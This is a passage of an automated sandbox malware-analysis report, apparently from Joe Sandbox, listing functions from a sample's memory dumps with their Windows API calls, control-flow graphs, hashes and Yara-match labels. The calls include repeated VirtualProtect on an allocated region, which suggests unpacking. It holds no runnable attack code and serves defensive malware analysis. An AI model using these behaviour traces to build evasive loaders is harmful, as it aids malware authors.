                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C8DC865
                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 6C8DC89D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorFileObjectReadSingleStatusWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3583596364-0
                                                                                                                                                                • Opcode ID: 7d3d7705e7b648e126a05e1314b297285bb57afa79d037fc26c995d7b0ab2a43
                                                                                                                                                                • Instruction ID: 5c17f39733db15735a7ea12fb940c46c5ded4d5478f811100b954b7c20be13b1
                                                                                                                                                                • Opcode Fuzzy Hash: 7d3d7705e7b648e126a05e1314b297285bb57afa79d037fc26c995d7b0ab2a43
                                                                                                                                                                • Instruction Fuzzy Hash: 92318170608305AFE710DF15C940B9BBBE4FB89718F108E2DF9A497691D774E988CB92
                                                                                                                                                                Function 6C8C93B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoSystem
                                                                                                                                                                • String ID: $
                                                                                                                                                                • API String ID: 31276548-3993045852
                                                                                                                                                                • Opcode ID: 5cb7550bc193abf6b9f0bcc505508db1402e94844483d9ba157797ff0f9537e1
                                                                                                                                                                • Instruction ID: 3a3244bf7565a5b6c4916504b2cb98399a31738cfbd74444f6a66ec1fa835d10
                                                                                                                                                                • Opcode Fuzzy Hash: 5cb7550bc193abf6b9f0bcc505508db1402e94844483d9ba157797ff0f9537e1
                                                                                                                                                                • Instruction Fuzzy Hash: 822168B44087469ED354DF28C28879EBBE4BF88748F808C2EE5D883340EB75A548CB53
                                                                                                                                                                Function 050950C0 Relevance: 1.0, Instructions: 952COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 8431c696a548a2c827faeed5478ab1629cb7ba272eb2677deae8018f1e601e79
                                                                                                                                                                • Instruction ID: fba6bc3c0fe2d900c8dbea16e5c176d3fb27a216150891ba93fa1192ccdbf8e4
                                                                                                                                                                • Opcode Fuzzy Hash: 8431c696a548a2c827faeed5478ab1629cb7ba272eb2677deae8018f1e601e79
                                                                                                                                                                • Instruction Fuzzy Hash: 7D825074A002199FDF59CF6AE894AAEBBF6BF88310F148459E406EB355DB30DC42DB50
                                                                                                                                                                Function 05095E98 Relevance: .9, Instructions: 882COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e7ccd1a98670c43dcc1889fcc80efc9c78932793cf434c0f15eeff888d5596a3
                                                                                                                                                                • Instruction ID: 2ba6dbd4b19ae1c3f9fec495d19590395d65992089c3d437c2d76a45cca97bd4
                                                                                                                                                                • Opcode Fuzzy Hash: e7ccd1a98670c43dcc1889fcc80efc9c78932793cf434c0f15eeff888d5596a3
                                                                                                                                                                • Instruction Fuzzy Hash: 4A825C30A00209DFCF19CF68E994AAEBBF6FF88314F158559E446AB2A5D731EC41DB50
                                                                                                                                                                Function 05099AE0 Relevance: .4, Instructions: 377COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: f83b15242fdbd19f2cadcd3416772f2e7dda0a057476d94e34902ee5d8e62518
                                                                                                                                                                • Instruction ID: e1665d245b2d30dcc515113e40a35db46bcfe73c40876ca0367173b530f37bc0
                                                                                                                                                                • Opcode Fuzzy Hash: f83b15242fdbd19f2cadcd3416772f2e7dda0a057476d94e34902ee5d8e62518
                                                                                                                                                                • Instruction Fuzzy Hash: BBC1E430B0830ACBDF6C5A75A95533EB6E7BBC4A51F288D2DD89397688CE34C841A751
                                                                                                                                                                Function 050929E0 Relevance: .3, Instructions: 260COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000003.1472594607.0000000005090000.00000040.00000800.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_3_5090000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: f0d30a4a06a000fc6ef41758f80e5e0715a7fb4c4ed183b01fddf67ed159c724
                                                                                                                                                                • Instruction ID: 9bea1abec61742c2c0a314711907fa91c0bff616b11322b5a45a99f383720f85
                                                                                                                                                                • Opcode Fuzzy Hash: f0d30a4a06a000fc6ef41758f80e5e0715a7fb4c4ed183b01fddf67ed159c724
                                                                                                                                                                • Instruction Fuzzy Hash: 3A818D78F002199BDF0CEF75955477E7BA7BFC8750B058829E403EB288CE3498529B95
                                                                                                                                                                Function 6C8F0A1D Relevance: 13.6, APIs: 9, Instructions: 136COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • __RTC_Initialize.LIBCMT ref: 6C8F0A64
                                                                                                                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 6C8F0A7E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2442719207-0
                                                                                                                                                                • Opcode ID: 0886a039db9f446a86fce93988b19968762897dc881cf35cd8fb1f8c874c016b
                                                                                                                                                                • Instruction ID: e560af0f3dd2bd89bbcf1c1b9268e21ff2f79380abd2a3a5b420e9ee45fdd1f8
                                                                                                                                                                • Opcode Fuzzy Hash: 0886a039db9f446a86fce93988b19968762897dc881cf35cd8fb1f8c874c016b
                                                                                                                                                                • Instruction Fuzzy Hash: 6D41A771E05299BFDB318FA9CA00B9E7675EB857D9F104929E834A7B40D7308D478B90
                                                                                                                                                                Function 6C8F0ACD Relevance: 10.6, APIs: 7, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • dllmain_raw.LIBCMT ref: 6C8F0B0A
                                                                                                                                                                • dllmain_crt_dispatch.LIBCMT ref: 6C8F0B21
                                                                                                                                                                • DllMain.G2M(?,00000001,00000000,?,00000001,00000000,?,00000001,00000000,6C91B280,0000000C,00000007,6C91B258,00000010,6C8F0911,?), ref: 6C8F0B38
                                                                                                                                                                • DllMain.G2M(?,00000000,00000000,?,00000001,00000000,?,00000001,00000000,6C91B280,0000000C,00000007,6C91B258,00000010,6C8F0911,?), ref: 6C8F0B50
                                                                                                                                                                • dllmain_raw.LIBCMT ref: 6C8F0B69
                                                                                                                                                                • dllmain_crt_dispatch.LIBCMT ref: 6C8F0B7C
                                                                                                                                                                • dllmain_raw.LIBCMT ref: 6C8F0B8F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: dllmain_raw$Maindllmain_crt_dispatch
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2381195575-0
                                                                                                                                                                • Opcode ID: 4a0dc2cc089ee146e2018da690622cc336a751c61e5d888f86986fa7ed445490
                                                                                                                                                                • Instruction ID: 53fc0c7bef6e2bfb81d2a217cb6820a65d950f67b3f486acf1062b9ed7900f0b
                                                                                                                                                                • Opcode Fuzzy Hash: 4a0dc2cc089ee146e2018da690622cc336a751c61e5d888f86986fa7ed445490
                                                                                                                                                                • Instruction Fuzzy Hash: FB218071E01299BFCB318E59CA40EAF3A79EB85ADCF104925E834A7B10C7308D078BD0
                                                                                                                                                                Function 6C8DC180 Relevance: 9.2, APIs: 6, Instructions: 178fileCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 76 6c8dc180-6c8dc1af call 6c8de260 79 6c8dc1b1-6c8dc1d9 call 6c8de970 76->79 80 6c8dc1e3-6c8dc1e5 76->80 84 6c8dc1db-6c8dc1df 79->84 85 6c8dc1f0-6c8dc202 79->85 81 6c8dc1e8-6c8dc1ef 80->81 84->80 86 6c8dc20e-6c8dc210 85->86 87 6c8dc204-6c8dc206 85->87 89 6c8dc212-6c8dc21a 86->89 90 6c8dc234-6c8dc238 86->90 88 6c8dc208-6c8dc20c 87->88 87->89 91 6c8dc248-6c8dc24c 88->91 89->91 92 6c8dc21c-6c8dc21e 89->92 93 6c8dc23a-6c8dc23e 90->93 94 6c8dc220-6c8dc22c 90->94 98 6c8dc24e-6c8dc250 91->98 99 6c8dc259-6c8dc25b 91->99 92->91 92->94 93->94 97 6c8dc240-6c8dc244 93->97 95 6c8dc34b-6c8dc350 94->95 96 6c8dc232 94->96 102 6c8dc36f-6c8dc37b call 6c8ac770 95->102 96->81 97->94 103 6c8dc246 97->103 100 6c8dc25d 98->100 104 6c8dc252-6c8dc257 98->104 99->100 101 6c8dc297-6c8dc29f 99->101 105 6c8dc262-6c8dc271 100->105 101->105 102->81 103->91 104->105 107 6c8dc278-6c8dc27c 105->107 108 6c8dc273-6c8dc276 105->108 111 6c8dc27e-6c8dc295 107->111 112 6c8dc2a1-6c8dc2a3 107->112 110 6c8dc2bd-6c8dc2f1 CreateFileW 108->110 115 6c8dc2f3-6c8dc2fc 110->115 116 6c8dc352-6c8dc364 GetLastError 110->116 111->110 113 6c8dc2a5-6c8dc2a7 112->113 114 6c8dc2b0-6c8dc2b2 112->114 118 6c8dc2a9-6c8dc2ae 113->118 119 6c8dc2b8 113->119 114->94 114->119 120 6c8dc33d-6c8dc345 115->120 121 6c8dc2fe-6c8dc302 115->121 116->81 117 6c8dc36a-6c8dc36e 116->117 117->102 118->110 119->110 120->81 120->95 121->120 122 6c8dc304-6c8dc313 GetLastError 121->122 122->120 123 6c8dc315-6c8dc339 SetFileInformationByHandle 122->123 124 6c8dc33b 123->124 125 6c8dc380-6c8dc395 GetLastError CloseHandle 123->125 124->120 125->95 126 6c8dc397 125->126 126->81
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,00120114,FFFFFFFF,?,?,00000000,00000000), ref: 6C8DC2E8
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DC306
                                                                                                                                                                • SetFileInformationByHandle.KERNEL32(00000000,00000006,00000000,00000008), ref: 6C8DC331
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DC352
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DC380
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6C8DC38D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$FileHandle$CloseCreateInformation
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1617036312-0
                                                                                                                                                                • Opcode ID: 8c3a3ffb1aef7b5bf6f01b308ccf5bb75f3491a3e80a8b89ccc5a847e7f9654d
                                                                                                                                                                • Instruction ID: a7094db3d28f00b51ce8647e091c6bb5d24704d3187ae712101276433890bd7e
                                                                                                                                                                • Opcode Fuzzy Hash: 8c3a3ffb1aef7b5bf6f01b308ccf5bb75f3491a3e80a8b89ccc5a847e7f9654d
                                                                                                                                                                • Instruction Fuzzy Hash: 7E61E4B050C3449FEB25DF55C68075B7BE1AF86308F258A5DECAA87A87D331E544CB42
                                                                                                                                                                Function 6C8D4280 Relevance: 9.1, APIs: 6, Instructions: 111timesleepsynchronizationCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 127 6c8d4280-6c8d4294 128 6c8d4296-6c8d429a 127->128 129 6c8d42a0-6c8d42b3 CreateWaitableTimerExW 127->129 128->129 130 6c8d4341-6c8d4364 128->130 129->130 131 6c8d42b9-6c8d42dd 129->131 132 6c8d4398-6c8d4399 Sleep 130->132 133 6c8d4366-6c8d437a 130->133 134 6c8d42df-6c8d42f1 131->134 135 6c8d4337-6c8d433e CloseHandle 131->135 137 6c8d439f-6c8d43a6 132->137 133->132 136 6c8d437c-6c8d438e 133->136 134->135 138 6c8d42f3 134->138 135->130 136->132 139 6c8d4390-6c8d4396 136->139 138->135 140 6c8d42f5-6c8d4319 SetWaitableTimer 138->140 139->132 140->135 141 6c8d431b-6c8d4333 WaitForSingleObject CloseHandle 140->141 141->137 142 6c8d4335 141->142 142->130
                                                                                                                                                                APIs
                                                                                                                                                                • CreateWaitableTimerExW.KERNEL32(00000000,00000000,00000002,001F0003,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D42AB
                                                                                                                                                                • SetWaitableTimer.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,?,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D4311
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D431E
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D4327
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D4338
                                                                                                                                                                • Sleep.KERNEL32(FFFFFFFF,?,?,6C90D00C,?,?,6C8CB4F1), ref: 6C8D4399
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2261246915-0
                                                                                                                                                                • Opcode ID: 59a2655b15d055b2a3631700eef11549fab7aebe25f33f1eb28b28b2ca606bbd
                                                                                                                                                                • Instruction ID: 9c8e5a02723ee0dc9390b00eb0e73ae601804b2ec30bb27cf3061fdaf6beb65e
                                                                                                                                                                • Opcode Fuzzy Hash: 59a2655b15d055b2a3631700eef11549fab7aebe25f33f1eb28b28b2ca606bbd
                                                                                                                                                                • Instruction Fuzzy Hash: EA31E23170430457DB288F2E8DC5B9A3BA9ABC9720F568A3CFD28D7AD0D774A8448751
                                                                                                                                                                Function 6C8C958D Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 331fileCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 143 6c8c958d-6c8c968b call 6c8c93b0 call 6c8c9490 call 6c8c8ed0 call 6c8c9230 152 6c8c968d-6c8c96b2 143->152 153 6c8c96b6-6c8c96de 143->153 154 6c8c96eb-6c8c96f0 152->154 155 6c8c96b4 152->155 156 6c8c96e2-6c8c96e7 153->156 157 6c8c9776-6c8c977b 154->157 158 6c8c96f6-6c8c9772 154->158 155->156 159 6c8c96e9-6c8c96fd 156->159 160 6c8c9701-6c8c9706 156->160 161 6c8c977d-6c8c97b0 157->161 162 6c8c97b2-6c8c97ba 157->162 166 6c8c971a-6c8c9743 158->166 167 6c8c9774-6c8c978d call 6c8c8f30 158->167 159->166 176 6c8c96ff-6c8c9718 call 6c8c8f30 159->176 169 6c8c9708-6c8c9761 160->169 170 6c8c9763-6c8c976b 160->170 164 6c8c974d-6c8c9752 161->164 162->164 173 6c8c97bc-6c8c97fc 164->173 174 6c8c9754-6c8c9805 164->174 172 6c8c979b-6c8c97a7 166->172 189 6c8c978f 167->189 190 6c8c9791-6c8c9799 167->190 169->164 170->164 177 6c8c981c-6c8c9824 173->177 178 6c8c97fe-6c8c9818 173->178 184 6c8c9afd-6c8c9b32 VirtualAlloc 174->184 185 6c8c980b-6c8c9b5f 174->185 176->166 199 6c8c9745 176->199 186 6c8c995c-6c8c9964 177->186 187 6c8c982a-6c8c9853 177->187 197 6c8c9858-6c8c9860 178->197 198 6c8c981a 178->198 194 6c8c9b64-6c8c9b9b call 6c8c92f0 184->194 195 6c8c9b34-6c8c9c08 184->195 185->172 192 6c8c9976 186->192 193 6c8c9966-6c8c9971 186->193 187->172 189->166 190->164 207 6c8c9986-6c8c9990 call 6c8c92f0 192->207 200 6c8c987a-6c8c9958 CreateFileMappingW 193->200 194->172 195->172 203 6c8c986f 197->203 204 6c8c9862-6c8c986d 197->204 198->187 199->164 205 6c8c9998-6c8c99c9 call 6c8c92f0 200->205 206 6c8c995a 200->206 203->200 204->200 215 6c8c99d4-6c8c9a17 MapViewOfFile 205->215 206->207 213 6c8c9a1b-6c8c9a3e 207->213 214 6c8c9996 207->214 216 6c8c9a49-6c8c9a7a call 6c8c92f0 213->216 214->215 215->216 217 6c8c9a19 215->217 218 6c8c9a85-6c8c9af8 216->218 217->218
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6C8C93B0: GetSystemInfo.KERNEL32 ref: 6C8C9479
                                                                                                                                                                • CreateFileMappingW.KERNEL32 ref: 6C8C990F
                                                                                                                                                                • MapViewOfFile.KERNEL32 ref: 6C8C9A01
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CreateInfoMappingSystemView
                                                                                                                                                                • String ID: "$@
                                                                                                                                                                • API String ID: 3466721412-1136454570
                                                                                                                                                                • Opcode ID: fcc2fed896f4975c9e9ce8aab99f9d74aa70e3ae94d5e0d7a823c094a0f14aee
                                                                                                                                                                • Instruction ID: ff5b2b89f87aa104974649baf9a4b99ffc25e565227d0b95c25ad3a686277673
                                                                                                                                                                • Opcode Fuzzy Hash: fcc2fed896f4975c9e9ce8aab99f9d74aa70e3ae94d5e0d7a823c094a0f14aee
                                                                                                                                                                • Instruction Fuzzy Hash: B6027D7460D380CFD374CF28D294B8ABBE1AB8A308F158D9EE99887791D7759484CB47
                                                                                                                                                                Function 02646CD3 Relevance: 6.1, APIs: 4, Instructions: 99memoryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 221 2646cd3-2646ced call 2648ef1 224 2646cf5-2646d0e call 2648f8f 221->224 225 2646cef-2646cf0 221->225 229 2646d14-2646d1f 224->229 230 2646dc6 224->230 226 2646dca-2646dcd 225->226 229->230 231 2646d25-2646d33 VirtualProtect 229->231 232 2646dc8-2646dc9 230->232 231->230 233 2646d39-2646d7b call 2648ee7 call 264955f VirtualProtect call 2648f8f 231->233 232->226 233->230 240 2646d7d-2646d89 233->240 240->230 241 2646d8b-2646d99 VirtualProtect 240->241 241->230 242 2646d9b-2646dc4 call 2648ee7 call 264955f VirtualProtect 241->242 242->232
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 02648EF1: LoadLibraryA.KERNELBASE(00000000,?,?), ref: 02648F83
                                                                                                                                                                • VirtualProtect.KERNELBASE(00000000,0000000C,00000040,?), ref: 02646D2E
                                                                                                                                                                • VirtualProtect.KERNELBASE(00000000,0000000C,?,?), ref: 02646D61
                                                                                                                                                                • VirtualProtect.KERNELBASE(00000000,0040145E,00000040,?), ref: 02646D94
                                                                                                                                                                • VirtualProtect.KERNELBASE(00000000,0040145E,?,?), ref: 02646DBE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1571921794.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_2590000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 895956442-0
                                                                                                                                                                • Opcode ID: 93985e93d1afab8f719b8aa13ce6a91e230957808ceab0eaee363415b4ddc148
                                                                                                                                                                • Instruction ID: ba5a4401e51c5131491628bf56a52590df1330bd50bcf6586b370a0aa9ec18db
                                                                                                                                                                • Opcode Fuzzy Hash: 93985e93d1afab8f719b8aa13ce6a91e230957808ceab0eaee363415b4ddc148
                                                                                                                                                                • Instruction Fuzzy Hash: 6B2195722042497FE320AA668D48FB7769DDB46304F04043EFF87D2191EF65A90987A5
                                                                                                                                                                Function 02648EF1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66libraryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
